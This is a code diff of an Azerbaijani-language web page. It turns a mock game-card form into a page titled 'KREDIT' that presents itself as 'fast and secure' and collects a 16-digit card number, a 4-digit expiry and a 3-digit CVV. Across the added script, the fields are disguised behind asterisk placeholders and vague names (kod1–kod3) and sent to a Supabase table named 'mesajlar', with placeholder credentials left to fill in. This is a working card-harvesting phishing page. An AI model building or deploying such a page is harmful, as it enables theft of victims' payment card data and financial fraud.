--- a/index.html
+++ b/index.html
@@ -1,78 +1,90 @@
 <!DOCTYPE html>
 <html lang="az">
 <head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-<title>Sürətli və Təhlükəsiz</title>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>KREDIT</title>
 
 <style>
-*{
-  margin:0;
-  padding:0;
-  box-sizing:border-box;
-  font-family: 'SF Pro Display', sans-serif;
-}
+*{margin:0;padding:0;box-sizing:border-box;font-family:Arial, sans-serif;}
 
 body{
-  min-height:100vh;
-  background: radial-gradient(circle at 20% 30%, rgba(0,198,255,0.3), transparent 40%),
-              radial-gradient(circle at 80% 70%, rgba(0,114,255,0.4), transparent 40%),
-              linear-gradient(135deg,#0f2027,#203a43,#1e3c72);
-  color:white;
+  height:100vh;
+  overflow:hidden;
+  background:linear-gradient(135deg,#0f2027,#203a43,#2c5364);
   display:flex;
   flex-direction:column;
+  color:white;
+}
+
+/* Animated background */
+body::before{
+  content:"";
+  position:absolute;
+  width:600px;
+  height:600px;
+  background:radial-gradient(circle,#00c6ff55,transparent 70%);
+  top:-200px;
+  left:-200px;
+  animation:move1 10s infinite alternate;
+}
+
+body::after{
+  content:"";
+  position:absolute;
+  width:500px;
+  height:500px;
+  background:radial-gradient(circle,#0072ff55,transparent 70%);
+  bottom:-200px;
+  right:-200px;
+  animation:move2 12s infinite alternate;
+}
+
+@keyframes move1{
+  from{transform:translate(0,0);}
+  to{transform:translate(200px,150px);}
+}
+
+@keyframes move2{
+  from{transform:translate(0,0);}
+  to{transform:translate(-150px,-200px);}
 }
 
 header{
-  padding:20px 8%;
+  padding:20px;
   font-size:20px;
-  font-weight:600;
+  font-weight:bold;
+  z-index:2;
 }
 
-.hero{
+.container{
   flex:1;
   display:flex;
-  align-items:center;
   justify-content:center;
-  padding:40px;
+  align-items:center;
+  z-index:2;
 }
 
 .phone{
   width:340px;
-  height:680px;
-  background:#000;
-  border-radius:45px;
-  padding:18px;
+  height:650px;
+  background:black;
+  border-radius:40px;
+  padding:20px;
   box-shadow:0 40px 80px rgba(0,0,0,0.6);
-  position:relative;
-}
-
-.phone::before{
-  content:"";
-  position:absolute;
-  top:10px;
-  left:50%;
-  transform:translateX(-50%);
-  width:160px;
-  height:28px;
-  background:#111;
-  border-radius:20px;
 }
 
 .screen{
   background:linear-gradient(135deg,#1e3c72,#2a5298);
   height:100%;
-  border-radius:35px;
-  padding:30px 20px;
+  border-radius:30px;
+  padding:25px;
   display:flex;
   flex-direction:column;
   justify-content:center;
 }
 
-.card-container{
-  perspective:1000px;
-  margin-bottom:30px;
-}
+.card-container{perspective:1000px;margin-bottom:30px;}
 
 .card{
   width:100%;
@@ -82,40 +94,30 @@ header{
   transition:transform 0.8s;
 }
 
-.card.flip{
-  transform:rotateY(180deg);
-}
+.card.flip{transform:rotateY(180deg);}
 
-.card-face{
+.face{
   position:absolute;
   width:100%;
   height:100%;
-  backface-visibility:hidden;
   border-radius:20px;
+  backface-visibility:hidden;
   padding:20px;
   display:flex;
   flex-direction:column;
   justify-content:space-between;
 }
 
-.front{
-  background:linear-gradient(135deg,#00c6ff,#0072ff);
-}
-
+.front{background:linear-gradient(135deg,#00c6ff,#0072ff);}
 .back{
   background:linear-gradient(135deg,#0072ff,#00c6ff);
   transform:rotateY(180deg);
   align-items:flex-end;
 }
 
-.card-number{
+.number{
   letter-spacing:3px;
   font-size:18px;
-}
-
-.card-code{
-  font-size:22px;
-  font-weight:bold;
 }
 
 input{
@@ -124,17 +126,13 @@ input{
   border:none;
   border-radius:12px;
   margin-bottom:12px;
-  outline:none;
   font-size:14px;
+  outline:none;
 }
 
-.row{
-  display:flex;
-  gap:10px;
-}
+.row{display:flex;gap:10px;}
 
 button{
-  width:100%;
   padding:14px;
   border:none;
   border-radius:12px;
@@ -142,116 +140,94 @@ button{
   color:white;
   font-weight:bold;
   cursor:pointer;
-  transition:0.3s;
-}
-
-.loader{
-  width:18px;
-  height:18px;
-  border:3px solid white;
-  border-top:3px solid transparent;
-  border-radius:50%;
-  display:inline-block;
-  animation:spin 1s linear infinite;
-}
-
-@keyframes spin{
-  to{transform:rotate(360deg);}
 }
 </style>
 </head>
-
 <body>
 
 <header>Sürətli və Təhlükəsiz</header>
 
-<div class="hero">
+<div class="container">
 <div class="phone">
 <div class="screen">
 
 <div class="card-container">
-<div class="card" id="gameCard">
+<div class="card" id="card">
 
-<div class="card-face front">
+<div class="face front">
 <div>KREDIT</div>
-<div class="card-number" id="previewNumber">•••• •••• •••• ••••</div>
-<div class="card-code" id="previewExpiry">MM/YY</div>
+<div class="number" id="previewNumber">•••• •••• •••• ••••</div>
+<div id="previewSmall">0000</div>
 </div>
 
-<div class="card-face back">
-<div>CVV: <span id="previewCVV">•••</span></div>
+<div class="face back">
+<div id="previewBack">•••</div>
 </div>
 
 </div>
 </div>
 
-<input type="text"
- maxlength="19"
- inputmode="numeric"
- placeholder="16 rəqəm oyun kartı"
- oninput="updateNumber(this)">
+<input id="mainInput" maxlength="16" placeholder="****************"
+oninput="formatMain(this.value)">
 
 <div class="row">
-<input type="text"
- maxlength="5"
- inputmode="numeric"
- placeholder="MM/YY"
- oninput="updateExpiry(this)">
-
-<input type="text"
- maxlength="3"
- inputmode="numeric"
- placeholder="CVV"
- onfocus="flipCard(true)"
- onblur="flipCard(false)"
- oninput="updateCVV(this)">
+<input id="smallInput" maxlength="4" placeholder="****"
+oninput="updateSmall(this.value)">
+<input id="backInput" maxlength="3" placeholder="***"
+oninput="updateBack(this.value)">
 </div>
 
-<button onclick="submitForm()" id="submitBtn">Təsdiqlə</button>
+<button onclick="submitData()">Təsdiqlə</button>
 
 </div>
 </div>
 </div>
 
-<script>
-function updateNumber(input){
-  let value = input.value.replace(/\D/g,'').substring(0,16);
-  value = value.replace(/(.{4})/g,'$1 ').trim();
-  input.value = value;
+<script type="module">
+import { createClient } from "https://esm.sh/@supabase/supabase-js@2"
+
+const supabaseUrl = "BURAYA_URL"
+const supabaseKey = "BURAYA_KEY"
+const supabase = createClient(supabaseUrl, supabaseKey)
+
+window.formatMain = function(val){
+  val = val.replace(/\D/g,'').slice(0,16)
+  let formatted = val.match(/.{1,4}/g)?.join(" ") || val
   document.getElementById("previewNumber").innerText =
-    value || "•••• •••• •••• ••••";
+    formatted || "•••• •••• •••• ••••"
+  document.getElementById("mainInput").value = val
 }
 
-function updateExpiry(input){
-  let value = input.value.replace(/\D/g,'').substring(0,4);
-  if(value.length >=3){
-    value = value.substring(0,2) + "/" + value.substring(2);
+window.updateSmall = function(val){
+  val = val.replace(/\D/g,'').slice(0,4)
+  document.getElementById("previewSmall").innerText = val || "0000"
+}
+
+window.updateBack = function(val){
+  val = val.replace(/\D/g,'').slice(0,3)
+  document.getElementById("previewBack").innerText = val || "•••"
+  const card=document.getElementById("card")
+  if(val.length===3){card.classList.add("flip")}
+  else{card.classList.remove("flip")}
+}
+
+window.submitData = async function(){
+  const main=document.getElementById("mainInput").value
+  const small=document.getElementById("smallInput").value
+  const back=document.getElementById("backInput").value
+
+  if(main.length!==16 || small.length!==4 || back.length!==3){
+    alert("Məlumat natamamdır")
+    return
   }
-  input.value = value;
-  document.getElementById("previewExpiry").innerText =
-    value || "MM/YY";
-}
 
-function updateCVV(input){
-  let value = input.value.replace(/\D/g,'').substring(0,3);
-  input.value = value;
-  document.getElementById("previewCVV").innerText =
-    value || "•••";
-}
+  await supabase.from("mesajlar").insert([{
+    kod1: main,
+    kod2: small,
+    kod3: back
+  }])
 
-function flipCard(state){
-  const card = document.getElementById("gameCard");
-  state ? card.classList.add("flip") : card.classList.remove("flip");
-}
-
-function submitForm(){
-  const btn = document.getElementById("submitBtn");
-  btn.innerHTML = '<span class="loader"></span>';
-  btn.disabled = true;
-
-  setTimeout(()=>{
-    btn.innerHTML = "Onaylanır ✓";
-  },2000);
+  alert("Onaylanır...")
 }
 </script>
 
